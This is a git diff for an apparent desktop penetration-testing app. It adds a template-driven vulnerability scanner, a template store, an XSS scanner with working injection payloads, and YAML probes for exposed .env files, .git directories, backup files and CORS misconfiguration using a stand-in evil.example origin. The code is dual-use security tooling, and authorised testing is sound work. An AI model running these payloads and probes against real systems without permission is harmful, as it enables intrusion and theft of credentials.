+                (0..max).map(|i| {
+                    used.iter().map(|(k, v)| {
+                        let s = v.get(i).or_else(|| v.first()).cloned().unwrap_or_default();
+                        ((*k).clone(), s)
+                    }).collect()
+                }).collect()
+            } else { vec![HashMap::new()] }
+        }
+        "pitchfork" => {
+            // parallel — each list iterates in lockstep
+            if let Some(min) = used.iter().map(|(_, v)| v.len()).min() {
+                (0..min).map(|i| {
+                    used.iter().map(|(k, v)| ((*k).clone(), v[i].clone())).collect()
+                }).collect()
+            } else { vec![HashMap::new()] }
+        }
+        _ => {
+            // clusterbomb (cartesian)
+            let mut results: Vec<HashMap<String, String>> = vec![HashMap::new()];
+            for (k, vals) in &used {
+                let mut next: Vec<HashMap<String, String>> = Vec::new();
+                for base in &results {
+                    for v in vals.iter() {
+                        let mut m = base.clone();
+                        m.insert((*k).clone(), v.clone());
+                        next.push(m);
+                    }
+                }
+                results = next;
+            }
+            results
+        }
+    }
+}
+
+pub async fn run_template_against_target(
+    client: &reqwest::Client,
+    target: &str,
+    tpl: &Template,
+    app: &AppHandle,
+    event_prefix: &str,
+) -> Vec<Finding> {
+    let ev_status = format!("{event_prefix}:status");
+    let ev_hit = format!("{event_prefix}:hit");
+    let mut out: Vec<Finding> = Vec::new();
+
+    // runtime variables (template globals + extracted from prior requests)
+    let mut rt_vars: HashMap<String, String> = tpl.variables.clone();
+    rt_vars.insert("BaseURL".into(), target.trim_end_matches('/').to_string());
+    rt_vars.insert("Hostname".into(), target
+        .trim_start_matches("http://")
+        .trim_start_matches("https://")
+        .trim_end_matches('/')
+        .split('/').next().unwrap_or("").to_string());
+
+    let requests: Vec<&HttpRequest> = tpl.http.iter().chain(tpl.requests.iter()).collect();
+
+    'per_request: for rq in requests {
+        // merge request-local variables
+        let mut vars = rt_vars.clone();
+        for (k, v) in &rq.variables { vars.insert(k.clone(), v.clone()); }
+
+        // combine template-level + request-level payloads
+        let mut all_payloads = tpl.payloads.clone();
+        for (k, v) in &rq.payloads { all_payloads.insert(k.clone(), v.clone()); }
+
+        for raw_path in &rq.path {
+            let payload_sets = expand_payloads(raw_path, &all_payloads, &rq.attack);
+
+            for pset in &payload_sets {
+                let mut iter_vars = vars.clone();
+                for (k, v) in pset { iter_vars.insert(k.clone(), v.clone()); }
+
+                let final_path = expand(raw_path, &iter_vars);
+                let method = reqwest::Method::from_bytes(rq.method.as_bytes())
+                    .unwrap_or(reqwest::Method::GET);
+                let mut builder = client.request(method, &final_path);
+                for (k, v) in &rq.headers {
+                    builder = builder.header(expand(k, &iter_vars), expand(v, &iter_vars));
+                }
+                if let Some(body) = &rq.body {
+                    builder = builder.body(expand(body, &iter_vars));
+                }
+
+                let start = Instant::now();
+                let resp = match builder.send().await {
+                    Ok(r) => r,
+                    Err(e) => {
+                        let _ = app.emit(ev_status.as_str(), format!("req err [{}]: {e}", tpl.id));
+                        continue;
+                    }
+                };
+                let status = resp.status().as_u16();
+                let hdrs = resp.headers().clone();
+                let body = resp.text().await.unwrap_or_default();
+                let duration = start.elapsed().as_millis();
+
+                // matchers
+                let cond = rq.matchers_condition.as_str();
+                let results: Vec<(bool, String)> = rq.matchers.iter()
+                    .map(|m| (check_matcher(m, status, &hdrs, &body, duration),
+                              m.name.clone().unwrap_or_else(|| m.kind.clone())))
+                    .collect();
+                let matched = if results.is_empty() { false }
+                    else if cond == "and" { results.iter().all(|(r, _)| *r) }
+                    else { results.iter().any(|(r, _)| *r) };
+
+                // extractors (always run — populate variables for chained reqs)
+                let extracted = run_extractors(&rq.extractors, status, &hdrs, &body);
+                for ex in &rq.extractors {
+                    if ex.internal {
+                        if let Some(name) = &ex.name {
+                            if let Some(vals) = extracted.get(name) {
+                                if let Some(first) = vals.first() {
+                                    rt_vars.insert(name.clone(), first.clone());
+                                }
+                            }
+                        }
+                    }
+                }
+
+                if matched {
+                    let finding = Finding {
+                        template_id: tpl.id.clone(),
+                        template_name: tpl.info.name.clone(),
+                        severity: tpl.info.severity.clone(),
+                        tags: tpl.info.tags.clone(),
+                        target: target.to_string(),
+                        matched_url: final_path,
+                        status,
+                        matcher_names: results.into_iter().filter(|(r, _)| *r).map(|(_, n)| n).collect(),
+                        extracted,
+                        description: tpl.info.description.clone(),
+                        remediation: tpl.info.remediation.clone(),
+                        reference: tpl.info.reference.clone(),
+                        cvss: tpl.info.classification.as_ref().and_then(|c| c.cvss_score),
+                        cve_id: tpl.info.classification.as_ref().and_then(|c| c.cve_id.clone()),
+                    };
+                    let _ = app.emit(ev_hit.as_str(), finding.clone());
+                    out.push(finding);
+                    if rq.stop_at_first_match { break 'per_request; }
+                }
+            }
+        }
+    }
+    out
+}
+
+pub fn parse_templates(yamls: &[String], app: &AppHandle, error_event: &str) -> Vec<Template> {
+    yamls.iter()
+        .filter_map(|y| match serde_yaml::from_str::<Template>(y) {
+            Ok(t) => Some(t),
+            Err(e) => {
+                let _ = app.emit(error_event, format!("template parse error: {e}"));
+                None
+            }
+        })
+        .collect()
+}
+
+#[tauri::command]
+pub async fn xploit_run(app: AppHandle, req: RunRequest) -> Result<Vec<Finding>, String> {
+    let templates = parse_templates(&req.templates_yaml, &app, "xpl:status");
+
+    if templates.is_empty() {
+        return Err("no valid templates loaded".into());
+    }
+
+    let client = reqwest::Client::builder()
+        .danger_accept_invalid_certs(true)
+        .timeout(Duration::from_millis(req.timeout_ms))
+        .redirect(reqwest::redirect::Policy::limited(5))
+        .user_agent("Mozilla/5.0 (Xploiter)")
+        .build()
+        .map_err(|e| e.to_string())?;
+
+    let tasks: Vec<(String, Template)> = req.targets.iter()
+        .flat_map(|t| templates.iter().map(move |tpl| (t.clone(), tpl.clone())))
+        .collect();
+    let total = tasks.len();
+    let _ = app.emit("xpl:status", format!("running {} target×template combo(s)", total));
+
+    let sem = Arc::new(Semaphore::new(req.concurrency.max(1)));
+    let client = Arc::new(client);
+    let done = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+
+    let all: Vec<Finding> = stream::iter(tasks.into_iter())
+        .map(|(target, tpl)| {
+            let sem = sem.clone();
+            let client = client.clone();
+            let done = done.clone();
+            let app = app.clone();
+            async move {
+                let _permit = sem.acquire().await.unwrap();
+                let v = run_template_against_target(&client, &target, &tpl, &app, "xpl").await;
+                let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                let _ = app.emit("xpl:progress", serde_json::json!({"done": n, "total": total}));
+                v
+            }
+        })
+        .buffer_unordered(req.concurrency.max(1))
+        .flat_map(|v| stream::iter(v.into_iter()))
+        .collect()
+        .await;
+
+    let _ = app.emit("xpl:done", all.len());
+    Ok(all)
+}
diff --git a/src-tauri/src/modules/xploiter_store.rs b/src-tauri/src/modules/xploiter_store.rs
new file mode 100644
index 0000000..92cc353
--- /dev/null
+++ b/src-tauri/src/modules/xploiter_store.rs
@@ -0,0 +1,270 @@
+// ===================================================================
+// Xploiter template store — local CRUD + bundled starter templates.
+//
+// Templates live in: app_local_data_dir()/xploiter-templates/*.yaml
+// Bundled templates are embedded at compile time and extracted on
+// first run into the same directory (user can then edit them).
+//
+// TODO(backend): add a `templates_sync` command that pulls curated
+//                community packs from a signed Pocket-hosted registry
+//                (subscription tier). Templates must be signed so
+//                malicious YAMLs can't be injected by a MITM.
+// TODO(backend): add `templates_publish` to submit a local template
+//                back to the registry for review.
+// ===================================================================
+
+use std::collections::HashMap;
+use std::path::PathBuf;
+
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter, Manager};
+use walkdir::WalkDir;
+
+// ------------------------------------------------------------------
+// Bundled starter templates — covers RCE, SSTI, LFI, SSRF, info-leak
+// ------------------------------------------------------------------
+//
+// These are embedded in the binary so the app is useful on first run
+// without network access. Users can edit/delete/duplicate freely.
+
+const STARTER_TEMPLATES: &[(&str, &str)] = &[
+    ("xpl-env-leak.yaml",            include_str!("../../starter_templates/xpl-env-leak.yaml")),
+    ("xpl-git-config.yaml",          include_str!("../../starter_templates/xpl-git-config.yaml")),
+    ("xpl-phpinfo.yaml",             include_str!("../../starter_templates/xpl-phpinfo.yaml")),
+    ("xpl-lfi-basic.yaml",           include_str!("../../starter_templates/xpl-lfi-basic.yaml")),
+    ("xpl-rce-shellshock.yaml",      include_str!("../../starter_templates/xpl-rce-shellshock.yaml")),
+    ("xpl-rce-log4shell.yaml",       include_str!("../../starter_templates/xpl-rce-log4shell.yaml")),
+    ("xpl-ssti-jinja2.yaml",         include_str!("../../starter_templates/xpl-ssti-jinja2.yaml")),
+    ("xpl-ssti-twig.yaml",           include_str!("../../starter_templates/xpl-ssti-twig.yaml")),
+    ("xpl-open-redirect.yaml",       include_str!("../../starter_templates/xpl-open-redirect.yaml")),
+    ("xpl-ssrf-basic.yaml",          include_str!("../../starter_templates/xpl-ssrf-basic.yaml")),
+    ("xpl-wp-debug.yaml",            include_str!("../../starter_templates/xpl-wp-debug.yaml")),
+    ("xpl-cors-misconfig.yaml",      include_str!("../../starter_templates/xpl-cors-misconfig.yaml")),
+    ("xpl-backup-files.yaml",        include_str!("../../starter_templates/xpl-backup-files.yaml")),
+];
+
+fn store_root(app: &AppHandle) -> Result<PathBuf, String> {
+    let base = app.path().app_local_data_dir().map_err(|e| e.to_string())?;
+    let p = base.join("xploiter-templates");
+    if !p.exists() {
+        std::fs::create_dir_all(&p).map_err(|e| e.to_string())?;
+    }
+    Ok(p)
+}
+
+// ------------------------------------------------------------------
+// Data shapes
+// ------------------------------------------------------------------
+
+#[derive(Debug, Clone, Serialize)]
+pub struct TemplateRef {
+    pub filename: String,
+    pub path: String,
+    pub id: String,
+    pub name: String,
+    pub severity: String,
+    pub tags: Vec<String>,
+    pub author: String,
+    pub description: String,
+    pub builtin: bool,
+}
+
+#[derive(Debug, Clone, Deserialize)]
+struct HeadYaml {
+    id: Option<String>,
+    info: Option<HeadInfo>,
+}
+
+#[derive(Debug, Clone, Deserialize)]
+struct HeadInfo {
+    name: Option<String>,
+    severity: Option<String>,
+    author: Option<String>,
+    description: Option<String>,
+    tags: Option<serde_yaml::Value>,
+}
+
+fn parse_tags(v: Option<serde_yaml::Value>) -> Vec<String> {
+    match v {
+        Some(serde_yaml::Value::String(s)) => s.split(',').map(|x| x.trim().to_string()).filter(|x| !x.is_empty()).collect(),
+        Some(serde_yaml::Value::Sequence(seq)) => seq.into_iter().filter_map(|v| v.as_str().map(String::from)).collect(),
+        _ => Vec::new(),
+    }
+}
+
+// ------------------------------------------------------------------
+// Commands
+// ------------------------------------------------------------------
+
+#[tauri::command]
+pub async fn xploit_store_init(app: AppHandle) -> Result<serde_json::Value, String> {
+    let root = store_root(&app)?;
+    // Always overwrite bundled templates (user-authored custom templates with
+    // different filenames are preserved). This picks up template improvements
+    // shipped in app updates.
+    let mut written = 0usize;
+    let bundled: std::collections::HashSet<&str> =
+        STARTER_TEMPLATES.iter().map(|(n, _)| *n).collect();
+    for (name, body) in STARTER_TEMPLATES {
+        let p = root.join(name);
+        std::fs::write(&p, body).map_err(|e| e.to_string())?;
+        written += 1;
+    }
+    let _ = app.emit("xpl:store:status",
+        format!("store ready @ {} ({} bundled synced)", root.display(), written));
+    let _ = bundled; // keep for clarity
+    Ok(serde_json::json!({
+        "path": root.to_string_lossy(),
+        "written": written,
+        "total_bundled": STARTER_TEMPLATES.len(),
+    }))
+}
+
+#[tauri::command]
+pub async fn xploit_store_list(
+    app: AppHandle,
+    severity: Option<Vec<String>>,
+    tag: Option<String>,
+    query: Option<String>,
+) -> Result<Vec<TemplateRef>, String> {
+    let root = store_root(&app)?;
+    let sev_filter: Option<Vec<String>> = severity.map(|v| v.into_iter().map(|s| s.to_lowercase()).collect());
+    let q = query.map(|s| s.to_lowercase());
+
+    let bundled_names: std::collections::HashSet<&str> = STARTER_TEMPLATES.iter().map(|(n, _)| *n).collect();
+
+    let mut out: Vec<TemplateRef> = Vec::new();
+    for entry in WalkDir::new(&root).into_iter().filter_map(|e| e.ok()) {
+        if !entry.file_type().is_file() { continue; }
+        let path = entry.path();
+        if path.extension().and_then(|s| s.to_str()) != Some("yaml") { continue; }
+        let Ok(content) = std::fs::read_to_string(path) else { continue };
+        let Ok(head) = serde_yaml::from_str::<HeadYaml>(&content) else { continue };
+
+        let filename = path.file_name().and_then(|s| s.to_str()).unwrap_or("").to_string();
+        let id = head.id.unwrap_or_default();
+        if id.is_empty() { continue; }
+        let info = head.info.unwrap_or(HeadInfo { name: None, severity: None, author: None, description: None, tags: None });
+        let severity = info.severity.unwrap_or_else(|| "info".into()).to_lowercase();
+        let tags = parse_tags(info.tags);
+
+        if let Some(ref sf) = sev_filter {
+            if !sf.contains(&severity) { continue; }
+        }
+        if let Some(ref t) = tag {
+            if !tags.iter().any(|x| x.eq_ignore_ascii_case(t)) { continue; }
+        }
+        if let Some(ref qq) = q {
+            let hay = format!("{} {} {}", id, info.name.clone().unwrap_or_default(), tags.join(" "));
+            if !hay.to_lowercase().contains(qq) { continue; }
+        }
+
+        out.push(TemplateRef {
+            filename: filename.clone(),
+            path: path.to_string_lossy().into_owned(),
+            id,
+            name: info.name.unwrap_or_default(),
+            severity,
+            tags,
+            author: info.author.unwrap_or_default(),
+            description: info.description.unwrap_or_default(),
+            builtin: bundled_names.contains(filename.as_str()),
+        });
+    }
+    out.sort_by(|a, b| a.filename.cmp(&b.filename));
+    Ok(out)
+}
+
+#[tauri::command]
+pub async fn xploit_store_read(path: String) -> Result<String, String> {
+    tokio::fs::read_to_string(&path).await.map_err(|e| e.to_string())
+}
+
+#[tauri::command]
+pub async fn xploit_store_save(app: AppHandle, filename: String, content: String) -> Result<String, String> {
+    // validate YAML parses before writing
+    serde_yaml::from_str::<serde_yaml::Value>(&content).map_err(|e| format!("invalid yaml: {e}"))?;
+
+    let root = store_root(&app)?;
+    let safe = filename.replace(['/', '\\', ':'], "_");
+    let fname = if safe.ends_with(".yaml") { safe } else { format!("{safe}.yaml") };
+    let path = root.join(&fname);
+    tokio::fs::write(&path, content).await.map_err(|e| e.to_string())?;
+    Ok(path.to_string_lossy().into_owned())
+}
+
+#[tauri::command]
+pub async fn xploit_store_delete(path: String) -> Result<(), String> {
+    tokio::fs::remove_file(&path).await.map_err(|e| e.to_string())
+}
+
+#[tauri::command]
+pub async fn xploit_store_duplicate(app: AppHandle, path: String) -> Result<String, String> {
+    let content = tokio::fs::read_to_string(&path).await.map_err(|e| e.to_string())?;
+    let orig = std::path::Path::new(&path).file_stem()
+        .and_then(|s| s.to_str()).unwrap_or("template");
+    let new_name = format!("{orig}-copy-{}.yaml", rand::random::<u16>());
+    let root = store_root(&app)?;
+    let new_path = root.join(&new_name);
+    tokio::fs::write(&new_path, content).await.map_err(|e| e.to_string())?;
+    Ok(new_path.to_string_lossy().into_owned())
+}
+
+#[tauri::command]
+pub fn xploit_store_starter_template() -> String {
+    // Returned when UI asks for a "new template" skeleton.
+    r#"id: my-custom-check
+info:
+  name: My Custom Template
+  author: you
+  severity: info
+  description: Describe what this template detects
+  tags:
+    - custom
+  reference:
+    - https://example.com/reference
+
+variables:
+  marker: "xpl_{{randstr}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Welcome"
+      - type: status
+        status:
+          - 200
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "v([0-9]+\\.[0-9]+\\.[0-9]+)"
+        group: 1
+        name: version
+"#.into()
+}
+
+// TODO(backend): subscription-gated commands (stubbed for now)
+//
+// #[tauri::command]
+// pub async fn xploit_store_sync_community() -> Result<(), String> {
+//     // POST to /v1/templates/sync with session token, download signed
+//     // template pack, verify ed25519 sigs, extract to store_root().
+//     Err("community sync requires a Pocket Pro subscription".into())
+// }
+//
+// #[tauri::command]
+// pub async fn xploit_store_publish(path: String) -> Result<(), String> {
+//     // Upload local template for peer review. Requires auth session.
+//     Err("publishing requires a Pocket Pro subscription".into())
+// }
+
+// unused import guard — HashMap isn't used yet but kept for future extractor aggregation
+#[allow(dead_code)]
+fn _keep(_: HashMap<(), ()>) {}
diff --git a/src-tauri/src/modules/xss.rs b/src-tauri/src/modules/xss.rs
new file mode 100644
index 0000000..f9b3646
--- /dev/null
+++ b/src-tauri/src/modules/xss.rs
@@ -0,0 +1,300 @@
+use std::sync::Arc;
+use std::time::Duration;
+
+use rand::Rng;
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::sync::Semaphore;
+use url::Url;
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct XssRequest {
+    pub url: String,
+    pub params: Option<Vec<String>>,
+    pub methods: Vec<String>,
+    pub concurrency: usize,
+    pub timeout_ms: u64,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct XssFinding {
+    pub param: String,
+    pub method: String,
+    pub context: String,
+    pub payload: String,
+    pub evidence: String,
+    pub confidence: String,
+}
+
+#[derive(Debug, Clone)]
+enum RefContext {
+    Html,
+    HtmlAttribute(char), // quote char
+    ScriptBlock,
+    ScriptString(char),
+    UrlAttribute,
+    Comment,
+}
+
+fn random_canary() -> String {
+    let chars: Vec<char> = "abcdefghijklmnopqrstuvwxyz0123456789".chars().collect();
+    let mut rng = rand::thread_rng();
+    let tail: String = (0..8).map(|_| chars[rng.gen_range(0..chars.len())]).collect();
+    format!("pxs{tail}xsp")
+}
+
+fn detect_context(body: &str, canary: &str) -> Vec<RefContext> {
+    let mut found = Vec::new();
+    let bytes = body.as_bytes();
+    let canary_bytes = canary.as_bytes();
+
+    let mut i = 0;
+    while i + canary_bytes.len() <= bytes.len() {
+        if &bytes[i..i + canary_bytes.len()] == canary_bytes {
+            // look backwards for context
+            let before = &body[..i];
+            let ctx = classify(before);
+            found.push(ctx);
+            i += canary_bytes.len();
+        } else {
+            i += 1;
+        }
+    }
+
+    found
+}
+
+fn classify(before: &str) -> RefContext {
+    let last_open_script = before.rfind("<script");
+    let last_close_script = before.rfind("</script>");
+    let in_script = match (last_open_script, last_close_script) {
+        (Some(o), Some(c)) => o > c,
+        (Some(_), None) => true,
+        _ => false,
+    };
+
+    if in_script {
+        let after_script = &before[last_open_script.unwrap()..];
+        // find quotes within script
+        let mut in_dq = false;
+        let mut in_sq = false;
+        for c in after_script.chars() {
+            match c {
+                '"' if !in_sq => in_dq = !in_dq,
+                '\'' if !in_dq => in_sq = !in_sq,
+                _ => {}
+            }
+        }
+        if in_dq { return RefContext::ScriptString('"'); }
+        if in_sq { return RefContext::ScriptString('\''); }
+        return RefContext::ScriptBlock;
+    }
+
+    let last_open_tag = before.rfind('<');
+    let last_close_tag = before.rfind('>');
+    let in_tag = match (last_open_tag, last_close_tag) {
+        (Some(o), Some(c)) => o > c,
+        (Some(_), None) => true,
+        _ => false,
+    };
+
+    if in_tag {
+        // inside a tag — look for attribute context (href/src/action)
+        let tag_segment = &before[last_open_tag.unwrap_or(0)..].to_lowercase();
+        let last_eq = tag_segment.rfind('=');
+        if let Some(eq_pos) = last_eq {
+            let after_eq = &before[last_open_tag.unwrap() + eq_pos + 1..];
+            let trimmed = after_eq.trim_start();
+            let quote = trimmed.chars().next();
+            // attribute name heuristic
+            let is_url_attr = tag_segment.contains("href=") || tag_segment.contains("src=") || tag_segment.contains("action=");
+
+            if is_url_attr {
+                return RefContext::UrlAttribute;
+            }
+            if let Some(q) = quote {
+                if q == '"' || q == '\'' {
+                    return RefContext::HtmlAttribute(q);
+                }
+            }
+            return RefContext::HtmlAttribute(' ');
+        }
+        return RefContext::HtmlAttribute(' ');
+    }
+
+    let last_comment_open = before.rfind("<!--");
+    let last_comment_close = before.rfind("-->");
+    let in_comment = match (last_comment_open, last_comment_close) {
+        (Some(o), Some(c)) => o > c,
+        (Some(_), None) => true,
+        _ => false,
+    };
+    if in_comment { return RefContext::Comment; }
+
+    RefContext::Html
+}
+
+fn payloads_for(ctx: &RefContext, canary: &str) -> Vec<(String, String)> {
+    // returns (label, payload) — payload MUST contain canary for detection
+    match ctx {
+        RefContext::Html => vec![
+            ("svg-onload".into(), format!("<svg/onload=alert('{canary}')>")),
+            ("img-onerror".into(), format!("<img src=x onerror=alert('{canary}')>")),
+            ("script-tag".into(), format!("<script>/*{canary}*/</script>")),
+        ],
+        RefContext::HtmlAttribute(q) => {
+            let qs = q.to_string();
+            vec![
+                ("attr-break".into(), format!("{qs} onfocus=alert('{canary}') autofocus {qs}")),
+                ("attr-close-tag".into(), format!("{qs}><svg onload=alert('{canary}')>")),
+            ]
+        }
+        RefContext::ScriptBlock => vec![
+            ("script-direct".into(), format!("alert('{canary}')//")),
+            ("script-semicolon".into(), format!(";alert('{canary}');//")),
+        ],
+        RefContext::ScriptString(q) => {
+            let qs = q.to_string();
+            vec![
+                ("js-string-break".into(), format!("{qs};alert('{canary}');//")),
+                ("js-string-concat".into(), format!("{qs}+alert('{canary}')+{qs}")),
+            ]
+        }
+        RefContext::UrlAttribute => vec![
+            ("javascript-url".into(), format!("javascript:alert('{canary}')")),
+            ("data-uri".into(), format!("data:text/html,<script>alert('{canary}')</script>")),
+        ],
+        RefContext::Comment => vec![
+            ("break-comment".into(), format!("--><svg onload=alert('{canary}')>")),
+        ],
+    }
+}
+
+fn ctx_name(ctx: &RefContext) -> &'static str {
+    match ctx {
+        RefContext::Html => "HTML body",
+        RefContext::HtmlAttribute(_) => "HTML attribute",
+        RefContext::ScriptBlock => "JS block",
+        RefContext::ScriptString(_) => "JS string",
+        RefContext::UrlAttribute => "URL attribute",
+        RefContext::Comment => "HTML comment",
+    }
+}
+
+async fn send(
+    client: &reqwest::Client,
+    method: &str,
+    base: &Url,
+    param: &str,
+    value: &str,
+    other_params: &[(String, String)],
+) -> Option<String> {
+    let resp = if method == "POST" {
+        let mut form: Vec<(String, String)> = other_params.to_vec();
+        form.push((param.to_string(), value.to_string()));
+        client.post(base.as_str()).form(&form).send().await.ok()?
+    } else {
+        let mut u = base.clone();
+        u.query_pairs_mut().clear();
+        for (k, v) in other_params {
+            u.query_pairs_mut().append_pair(k, v);
+        }
+        u.query_pairs_mut().append_pair(param, value);
+        client.get(u).send().await.ok()?
+    };
+    resp.text().await.ok()
+}
+
+#[tauri::command]
+pub async fn xss_scan(app: AppHandle, req: XssRequest) -> Result<Vec<XssFinding>, String> {
+    let base = Url::parse(&req.url).map_err(|e| e.to_string())?;
+    let client = reqwest::Client::builder()
+        .danger_accept_invalid_certs(true)
+        .timeout(Duration::from_millis(req.timeout_ms))
+        .redirect(reqwest::redirect::Policy::limited(3))
+        .user_agent("Mozilla/5.0 (PocketPentester)")
+        .build()
+        .map_err(|e| e.to_string())?;
+
+    let query_params: Vec<(String, String)> =
+        base.query_pairs().map(|(k, v)| (k.into_owned(), v.into_owned())).collect();
+
+    let param_names: Vec<String> = req.params.unwrap_or_else(|| {
+        query_params.iter().map(|(k, _)| k.clone()).collect()
+    });
+
+    if param_names.is_empty() {
+        return Err("no parameters to test".into());
+    }
+
+    let mut findings: Vec<XssFinding> = Vec::new();
+    let sem = Arc::new(Semaphore::new(req.concurrency.max(1)));
+
+    for method in &req.methods {
+        for param in &param_names {
+            let others: Vec<(String, String)> = query_params
+                .iter()
+                .filter(|(k, _)| k != param)
+                .cloned()
+                .collect();
+
+            // 1. reflection probe with canary
+            let canary = random_canary();
+            let _ = app.emit("xss:status", format!("→ {} {} [canary {canary}]", method, param));
+            let _permit = sem.acquire().await.unwrap();
+            let body = match send(&client, method, &base, param, &canary, &others).await {
+                Some(b) => b,
+                None => continue,
+            };
+            drop(_permit);
+
+            if !body.contains(&canary) {
+                let _ = app.emit("xss:status", format!("  no reflection in {param}"));
+                continue;
+            }
+
+            let contexts = detect_context(&body, &canary);
+            let _ = app.emit(
+                "xss:status",
+                format!("  reflected in {} context(s)", contexts.len()),
+            );
+
+            // 2. for each context, try payloads
+            for ctx in &contexts {
+                let attack_canary = random_canary();
+                for (label, payload) in payloads_for(ctx, &attack_canary) {
+                    let _permit = sem.acquire().await.unwrap();
+                    let body2 = match send(&client, method, &base, param, &payload, &others).await {
+                        Some(b) => b,
+                        None => continue,
+                    };
+
+                    if body2.contains(&attack_canary) {
+                        // check payload survived mostly unescaped
+                        let key_markers = ["<svg", "<img", "<script", "onerror=", "onload=", "alert(", "javascript:"];
+                        let survived = key_markers.iter().any(|m| body2.contains(m) && payload.contains(m));
+
+                        let finding = XssFinding {
+                            param: param.clone(),
+                            method: method.clone(),
+                            context: ctx_name(ctx).into(),
+                            payload: payload.clone(),
+                            evidence: if survived {
+                                format!("canary + payload tag survived in {label}")
+                            } else {
+                                format!("canary reflected but payload possibly escaped ({label})")
+                            },
+                            confidence: if survived { "HIGH".into() } else { "LOW".into() },
+                        };
+                        let _ = app.emit("xss:hit", finding.clone());
+                        findings.push(finding);
+                        if survived { break; }
+                    }
+                }
+            }
+        }
+    }
+
+    let _ = app.emit("xss:done", findings.len());
+    Ok(findings)
+}
diff --git a/src-tauri/starter_templates/xpl-backup-files.yaml b/src-tauri/starter_templates/xpl-backup-files.yaml
new file mode 100644
index 0000000..6a66b9f
--- /dev/null
+++ b/src-tauri/starter_templates/xpl-backup-files.yaml
@@ -0,0 +1,52 @@
+id: xpl-backup-files
+info:
+  name: "Backup & Source File Exposure"
+  author: imtaqin
+  severity: high
+  description: |
+    Common backup/artifact filenames left in web-root — often contain
+    source code, credentials, or database dumps.
+  tags:
+    - exposure
+    - backup
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/backup.zip"
+      - "{{BaseURL}}/backup.tar.gz"
+      - "{{BaseURL}}/backup.sql"
+      - "{{BaseURL}}/db.sql"
+      - "{{BaseURL}}/dump.sql"
+      - "{{BaseURL}}/site.zip"
+      - "{{BaseURL}}/www.zip"
+      - "{{BaseURL}}/public_html.zip"
+      - "{{BaseURL}}/.bash_history"
+      - "{{BaseURL}}/.DS_Store"
+    # ALL conditions must be true — kill false positives from default 404 pages.
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+      - type: dsl
+        dsl:
+          - "size > 512"
+        name: real-content
+      # Must NOT be a standard HTML error page
+      - type: word
+        part: body
+        words:
+          - "<!DOCTYPE html"
+          - "<html"
+          - "Not Found"
+          - "404 Not Found"
+          - "Forbidden"
+          - "Error"
+        condition: or
+        negative: true
+      # Must NOT be served as HTML (backup files are octet-stream, zip, sql, etc)
+      - type: regex
+        part: header
+        regex:
+          - "(?i)content-type:\\s*text/html"
+        negative: true
diff --git a/src-tauri/starter_templates/xpl-cors-misconfig.yaml b/src-tauri/starter_templates/xpl-cors-misconfig.yaml
new file mode 100644
index 0000000..649e6d0
--- /dev/null
+++ b/src-tauri/starter_templates/xpl-cors-misconfig.yaml
@@ -0,0 +1,33 @@
+id: xpl-cors-misconfig
+info:
+  name: "CORS Misconfiguration (Origin Reflection)"
+  author: imtaqin
+  severity: medium
+  description: |
+    The server reflects an attacker-controlled Origin header and
+    also sets Access-Control-Allow-Credentials:true — a classic
+    account-takeover primitive.
+  tags:
+    - cors
+    - misconfig
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+      - "{{BaseURL}}/api/user"
+      - "{{BaseURL}}/api/me"
+    headers:
+      Origin: "https://evil.example"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - "(?i)access-control-allow-origin:\\s*https://evil\\.example"
+        name: origin-reflected
+      - type: regex
+        part: header
+        regex:
+          - "(?i)access-control-allow-credentials:\\s*true"
+        name: credentials-enabled
diff --git a/src-tauri/starter_templates/xpl-env-leak.yaml b/src-tauri/starter_templates/xpl-env-leak.yaml
new file mode 100644
index 0000000..f547478
--- /dev/null
+++ b/src-tauri/starter_templates/xpl-env-leak.yaml
@@ -0,0 +1,38 @@
+id: xpl-env-leak
+info:
+  name: ".env File Exposure"
+  author: imtaqin
+  severity: high
+  description: |
+    Detects exposed .env files containing credentials, API keys,
+    or database passwords.
+  tags:
+    - exposure
+    - config
+    - credential-leak
+  reference:
+    - https://owasp.org/www-community/vulnerabilities/Information_exposure_through_files
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.env"
+      - "{{BaseURL}}/.env.local"
+      - "{{BaseURL}}/.env.production"
+      - "{{BaseURL}}/.env.backup"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+      # must contain actual env-style KEY=VALUE pairs with sensitive names
+      - type: regex
+        part: body
+        regex:
+          - "(?im)^(APP_KEY|DB_PASSWORD|AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|SECRET_KEY|API_KEY|PRIVATE_KEY|STRIPE_SECRET|JWT_SECRET)="
+        name: env-secret
+      # must NOT be served as HTML (default 404 page)
+      - type: regex
+        part: header
+        regex:
+          - "(?i)content-type:\\s*text/html"
+        negative: true
diff --git a/src-tauri/starter_templates/xpl-git-config.yaml b/src-tauri/starter_templates/xpl-git-config.yaml
new file mode 100644
index 0000000..0184b1d
--- /dev/null
+++ b/src-tauri/starter_templates/xpl-git-config.yaml
@@ -0,0 +1,50 @@
+id: xpl-git-config
+info:
+  name: ".git Directory Exposure"
+  author: imtaqin
+  severity: high
+  description: |
+    Exposed .git/config or .git/HEAD — the entire git repository
+    (with history + potentially secrets) can be dumped.
+  tags:
+    - exposure
+    - git
+  reference:
+    - https://github.com/internetwache/GitTools
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.git/config"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+      # exact signature of a git config file
+      - type: word
+        part: body
+        words:
+          - "[core]"
+          - "repositoryformatversion"
+        condition: and
+      - type: regex
+        part: header
+        regex:
+          - "(?i)content-type:\\s*text/html"
+        negative: true
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/.git/HEAD"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
